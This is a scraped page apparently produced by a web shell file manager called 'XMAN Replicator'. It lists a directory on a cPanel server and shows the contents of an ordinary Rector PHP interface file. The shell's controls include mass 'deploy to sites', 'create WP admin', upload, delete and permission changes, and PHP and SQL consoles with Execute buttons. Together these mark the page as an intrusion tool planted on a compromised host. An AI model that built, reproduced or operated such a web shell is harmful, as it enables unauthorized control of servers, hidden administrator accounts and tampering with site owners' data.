🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
rector
/
rector
/
src
/
PhpDocParser
/
PhpDocParser
/
Contract
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
PhpDocNodeVisitorInterface.php
630 B
-rw-r--r--
2024-11-08 13:59
✏️
🔄
🗑️
⬇️
🔒
View: PhpDocNodeVisitorInterface.php
<?php declare (strict_types=1); namespace Rector\PhpDocParser\PhpDocParser\Contract; use PHPStan\PhpDocParser\Ast\Node; /** * Inspired by https://github.com/nikic/PHP-Parser/blob/master/lib/PhpParser/NodeVisitor.php */ interface PhpDocNodeVisitorInterface { public function beforeTraverse(Node $node) : void; /** * @return int|\PHPStan\PhpDocParser\Ast\Node|null */ public function enterNode(Node $node); /** * @return null|int|\PhpParser\Node|Node[] Replacement node (or special return) */ public function leaveNode(Node $node); public function afterTraverse(Node $node) : void; }
PHP Console
Execute
SQL Console
Execute